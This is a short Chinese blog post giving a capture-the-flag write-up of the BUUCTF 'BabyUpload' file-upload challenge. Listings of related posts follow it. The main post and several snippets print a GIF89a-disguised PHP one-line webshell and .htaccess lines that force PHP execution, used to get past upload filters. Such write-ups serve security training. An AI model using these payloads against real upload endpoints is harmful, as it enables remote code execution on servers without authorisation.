buuctf-web-BabyUpload-个人思路

于 2022-11-21 17:10:44 发布
阅读量272 收藏
点赞数
分类专栏: 教学 CTF 文章标签: php 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunquan705/article/details/127968579
版权
教学 同时被 2 个专栏收录
17 篇文章 1 订阅
订阅专栏
CTF
2 篇文章 0 订阅
订阅专栏

是一题文件上传题目,先上传试试

过滤了php文件头,那就伪造一个

看样<?也被过滤了,所以在过滤一次

GIF89a<script language ="php"> eval($_POST['c']); </script>

用这个

结果后缀不能含有ph因此还得用别的方法

.htaccess文件绕过

AddType application/x-httpd-php .bendan

正常上传

接下来就写入shell即可

flag就出来了

benbenbendan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF WEB BabyUpload1
qq_41696858的博客
10-31 2741
最简单的一个文件上传,理论上只支持文件内容极少的jpeg和jpg,是的,你没有听错,内容极少 所以不要尝试去尝试上传一个jpg图片检测文件后缀,因为网上download下来的图片绝大多数内容超过限制 ok,那么经过检测,.htaccess没有被过滤 那么上传一个.htaccess文件,内容为 SetHandler application/x-httpd-php 表示凡是.htaccess文件夹所在目录的文件都由php进行处理 然后上传一句话,<script language=php>$_POST
BUU-WEB-[GXYCTF2019]BabyUpload
qq_24033605的博客
05-15 253
[GXYCTF2019]BabyUpload 尝试直接上传一句话木马。 (根据测试,只能提交图片格式的文件) 想到之前做的一道利用.htaccess的配置文件,将图片转换成php的文件上传题目。 尝试一下。 .htaccess内容为: <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 图片木马很神奇啊,图片只能以png格式,但是抓包时还得修改成jpeg格式,否则过不了。 上传成功后,就可以
[GXYCTF2019] web题-BabyUpload
BROTHERYY的博客
08-18 335
复现环境:buuoj.cn 上传题 直接上传png和.htaccess cd连接 flag{196e03ad-872b-44a3-9b8d-2526c9c49af2}
web buuctf [GXYCTF2019]BabyUpload1
weixin_44214568的博客
03-22 809
考点:.htaccess文件, 抓包修改content-type 文件上传漏洞 1.如题: 传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下: GIF89a?<script language="php">@eval($_POST[dd]);</script> 2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htacces
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [GXYCTF2019]BabyUpload
易编橙 · 终身成长社群,相遇已是上上签!
09-03 1296
思考:在实际应用场景中,常规类的文件上传、CMS类的文件上传、编辑器的上传或者CTF比赛中的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
GIF89a图片欺骗攻击
weixin_50464560的博客
08-06 2793
进入到linux的tmp目录里一看,很吃惊,一堆php开头的文件,如下图: 不知道是哪里来的,而且已经很久了。查看内容基本都是这样的: [root@kermit tmp]# cat phpzpqXzeGIF89a<%response.Write(987651234-123498765)strURL = Request.Servervariables(“url”)intPos = InstrRev(strURL,”/”)intStrLen = len(strURL)strFileName = Righ
BUUCTF web [GXYCTF2019]BabyUpload1 详解
llki666的博客
08-27 2353
打开后是这样的, 遇到文件上传题,先传一张普通图片试试, 提到了上传类型,用burpsuite抓包可以修改上传类型。再试试上传一句话木马: 提到后缀名不能有ph,也用burp suite能改。 准备一个文本文档写一句话木马: <script language='php'>eval($_POST['v']);</script> 推荐用这个,可以避开很多坑。然后直接把文本的后缀名txt改成jpg就行。 上传试试: 成功!现在需要把上传成功...
GIF89a图片头文件欺骗
热门推荐
piaolankeke
09-09 3万+
<br />1、什么是GIF89a<br />    一个GIF89a图形文件就是一个根据图形交换格式(GIF89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片
[收藏]GIF文件格式
在路上
02-09 2394
GIF文件格式 2. 文件结构   1 Header   GIF文件头
GIF 89a图像格式解析
QQ135102692的博客
05-17 6922
89a是针对87a的升级版本,相比于后者增加了一些额外的控制块更加精确的控制GIF播放。现在常见的GIF图都是89a,下面将使用一张10x10的gif来理解GIF的图像格式。
第二届华为武研119网络安全大赛misc部分wp
hezhing
11-02 3791
华为武研119网络安全大赛 报名就是线下赛。武研所得一个比赛。题目不错。有点小难。最后4秒第一被冲了。最后亚军。麻了。 MISC misc只做出来一道题。其他的等官方wp 神秘的视频 核心技术点:python字节码嵌入payload、gif异或加密 解题思路(附截图): 下载附件发现是个mp4,但是打不开。使用十六进制工具打开发现Rar头 更改后缀为.rar解压缩。得到一个流量包和一个pyc文件。首先反编译pyc文件。发现在上面有一行注释。 网上搜索发现一种用于在Python字节码中嵌入Payloa
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

benbenbendan

谢谢!!!!!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值